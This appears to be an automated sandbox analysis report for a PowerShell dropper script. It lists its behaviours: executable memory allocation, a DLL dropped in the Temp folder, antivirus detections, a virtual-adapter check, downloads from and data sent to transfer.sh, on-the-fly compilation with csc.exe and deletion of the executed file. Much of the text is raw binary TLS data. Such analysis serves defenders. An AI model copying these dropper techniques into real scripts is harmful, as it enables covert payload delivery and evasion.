NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 3012 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	c:\Users\test22\AppData\Local\Temp\fqxbg4nx.dll

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\fqxbg4nx.dll

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

ESET-NOD32	a variant of Generik.IFSXQHM
Avast	PwrSh:Dropper-AG [Drp]
AVG	PwrSh:Dropper-AG [Drp]

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 19, 2022, 9:44 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (12 events)

Data received	Y
Data received	UÇ£·ºf¶Ëµ ó 9uÄT¤öDOWNGRD )j1« ª¤K'ÊZR¼ïüï!üìÀ ÿ
Data received	¯
Data received	«¨!00 EÁPc¯RÍÈg-üHW£I0 H÷ 0210 UUS10U Let's Encrypt10 UR30 211104155905Z 220202155904Z010Utransfer.sh0"0 H÷ 0 Úç»=2[ cÃ`('øëêjßµÌ{².¿[D1w¿ íOX´ûXÅöFkÌÓuôÊêi¬ÙïÎ£¥Åðb»U!ÉLpù¥ò×¼Þ6ìná»#úTìÌÛ£jË·ø]Ù.]Zì÷±8ÔýßåD ²tsècg8¦nVóQV3ò(oE§}81æÑ2AO{ê¨°¾4¡ªöMh¾s\Ñîüu1ýÓKºg@Ur]»Ê¬_AËFâ=8£Lo²èz[IÎÃÀ]óWãF»+øûkÕt2n&Ö £G0C0Uÿ 0U%0++0Uÿ00UÜ¡Ø÷¬c~¯ã¶ji\âôJ0U#0.³·XVË®P @æ¯ÂÆ0U+I0G0!+0http://r3.o.lencr.org0"+0http://r3.i.lencr.org/0U0 transfer.sh0LU E0C0g07+ß0(0&+http://cps.letsencrypt.org0 +Öyöóñwß¥^«hOlî¸_N>ZêÍ¢¤j^;À D\s\|ëãÇH0F!êDO¿ÁBk¥³ßÊéæ¡ÝÀßîáEBß$ê3g!ÛºÎì®_LLx-y¯Ê áKXÇæéûNávF¥Uëuú 0µ¢iôó},At¾ýI¸«òüpþmG\|ëãÇ®G0E!¡uª'v §PÅfg2ÝeÆY7'mërï JÊpÃUñG7¶³9¡£/I®ªf~S¹[¯ÆpoY0 H÷ X8^?k¦Xì <v¬ùÊ® ¦±ó©¤¢³Úäa¾YÈaM×ÀºÆË³îC÷Ò & Åªæ¼S®!µárÏÏý7Ï/eëÃBÜÆt )Y°5Ó+N³OÇW×YâH¨þ9(Éw«jQíçÿ ,Ef0ü¿peGhàã«A _)6 4LpVÜj/)Û-ÿàÝ£èÑ>Yöh+ê¡ryì)àþÊùJ©.b eéÄBdPÁÖzßtiõÃÆäÞªMZ¸,K×y-,2ËlµtæëfùüèBù00þ +JÏ§SöÖ.%§_Z0 H÷ 0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10 200904000000Z 250915160000Z0210 UUS10U Let's Encrypt10 UR30"0 H÷ 0 »(Ìö ÓìUÃøñ¦zB§]&ªµ+¹ÅL±¯kùuÈ£×GU5W¨¢9õ<B©Nnõ;Ã.ÛÀ°\óY8çíÏiðZ¾À$%ú7q³ç¬áïÛä;ERE©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m¥@4k+Ó¼fëf4\|úkW)ø0]ºroûÅÒX=Çç »ñ+÷ÜÁÚq]ÔFãÌ%Á¼`guf³ñ÷¢\æSÿ:¶G¥ÿê w?SùÏåõ¦p¯c¤ÿ³ÜS§þH¡i®%u»ÌRõíQ¡Û£00Uÿ0U%0++0Uÿ0ÿ0U.³·XVË®P @æ¯ÂÆ0U#0y´Yæ{¶åäsÈXöén02+&0$0"+0http://x1.i.lencr.org/0'U 00 http://x1.c.lencr.org/0"U 00g0 +ß0 H÷ ÊNG>£÷D¼Õgx²cuM=3erT- êÃíø ¿_Ì·p·n;ö^Þä ¦ï²ç¢µ<Î´í9ç\|%Gæen?FôÙðÎ+îTÎ¼'K¸Á/¢¯ÍqJ·È¸#{-ùW>Ù3 G!x 'ÃÈ¹Î\òdÈÀ¾yÀOmD^».÷áèD)ÛY íc¹!ø&W eÁ "® C¡~àà7µZ±½0¿n+ÿ!NÃõð^¬Ã¥¸jð.¼;3¹îKÞÌüä¯?ÀUC6öhá6jÑÿ¥@§4·ÀÐc959unòºvÈé©KlÎÙ½û·hÔe³=wSøy 1uCØUrÄ)÷Ä]NÈ®F0×ò_¡y»ç^páÃ¹Üaq%¯ßí%PRhÜåÖµãÚ}Ðl!1®õû¹«È=áLå8ö½+½ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê\|/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£¸õ/ÒRC¦o2WeM2ß8S]~]f)ê¸ÝäµÍµVBÍÄNÆ%8DPmìÎUþéIdÔNÊ´[Às¨«¸GÂd0`0H @w!7ÔéB¸îvª<d ·0 H÷ 0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O10 UUS1)0'U Internet Security Research Group10UISRG Root X10"0 H÷ 0 è$sô7ó+W(¾Ü·ß8n<æW x÷uÂ¢þõjnöO(ÛÞhlD¶±cýk¿Òê1!~Ñ3<ºHõÝyß³¸ÿñ!KÁqiJffl~<p¿)"óäÀæ®âK·~ÓG\|H#Sè8®O o.ÑIWt¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOÂK~Ïèÿµw.ô²{JàL%p) áS$ìÙî¿³J?£aQÞ¬ôcqì.âo[á\4ylvï;byæÛ¤/&ÅÐáÞÙû·÷¨÷Çå6çâ7 6uûr±¼ùIØÝ´ÖAé¬v ØßÕ½5/(lÒÁ¨ dwnG7ºÎ¬Y^hrÖÅA)>Y>Ý&õ$É§Z£L@F¡µ§:Qn;}r§xYí>QxÐ/²>{JKsüÆêàP\|Ct³ÊtçÐ0Ô[q6´ºÁ00\H·;¦}`¢£)Ìº½¢A¡ÖñÂ¶ð¨\|;F¨HÜvv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpNæÙ:ÆÝ'Qnÿ¼dõ3CO£F0B0Uÿ0ÿ0Uÿ0K+?0=0;+0/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0Ä§±¤{,qúÛáKuÿÄ`0TU M0K0g0?+ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäsÈXöén0 H÷ slnÿRÐ®ÝçZ/¨ã¿É PÂålB»oô´OÂDuÌëbnxÞì'º9\õ¢¡nVpS±»ä¯Ð¢Ã+ÔôÅ 53ùØa6àq´¸µªEÀò©#(çÖ¡ËgÚ C,ªÉÞõ«i]õ[X"ÊMUäpgmÂWÅF9AÏXXmþWè6ð#ªýÐã\Iµµ5Ò.¿Nïàë;l)# `ÜEL;éûÞÜDøX®ê½EE¡]fÊþéoÈB ûéìãÞã8ú¤}±ØèI+èkO8w.ùÝç9
Data received	K
Data received	GAÇ®©¤Y¦5";xzOÂ&«`½\|f ïÃñ¼xá«XÝïËY22ÆÙúÆrTIéïIoµ¾~ø(u&§ja-8®}tGuåÕ2ÅØ64QáJ¦90øêÎÛ³üÓNDpÒ{FBâªYà*Ý!ÿíüx³;oº¡åÀXtÁ³dgh£É&Þ©Õð47êìÐDGÍhIÄ\|Í¬4¤wÅ¯s:RÇýÕfáP!0Hh;ýõ`æÿaªÞÿ^ýH¦Ú°kÇ/\|ßÝ<ªß¶.xö«@Û ôÀ¶Ý^¢÷}Æ)Ë0Úv§ÃÞ3ÊÐ¨b1,¢²ßXÑ¨Õ] íZqóìdHOlÈe0§ÜÔIb
Data received
Data received
Data received
Data received
Data received	0
Data received	ï9©ðÃ ºÑ3¶¯Bv7Ó,É8ä5mv/ÇYê]©dg(ËëB£e5g

Poweshell is sending data to a remote host (2 events)

Data sent	njaç^üÔE> sAh¥Õî÷î ÛvøÖL¯y<Â/5 ÀÀÀ À 28)ÿtransfer.sh
Data sent	FBA]Úáö¤ËñãCË³>~á¾¸´ÁÙ ÄÎùÏxw`Õ&Ñ»+BÊÚCðïtüê{oÆã>Ë0W@ <Ù\|®/D5"åÄ¶(ëdbÅËVNPµ^åÑ<6XÖÁ :¼$Ç>Í

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\fqxbg4nx.cmdline"

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\fqxbg4nx.cmdline

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send Jan. 19, 2022, 9:44 a.m.	buffer: njaç^üÔE> sAh¥Õî÷î ÛvøÖL¯y<Â/5 ÀÀÀ À 28)ÿtransfer.sh socket: 1552 sent: 115	1	115
send Jan. 19, 2022, 9:44 a.m.	buffer: FBA]Úáö¤ËñãCË³>~á¾¸´ÁÙ ÄÎùÏxw`Õ&Ñ»+BÊÚCðïtüê{oÆã>Ë0W@ <Ù\|®/D5"åÄ¶(ëdbÅËVNPµ^åÑ<6XÖÁ :¼$Ç>Í socket: 1552 sent: 134	1	134
WSASend Jan. 19, 2022, 9:44 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 2120		0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\fqxbg4nx.cmdline"

ffffffffffffff.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All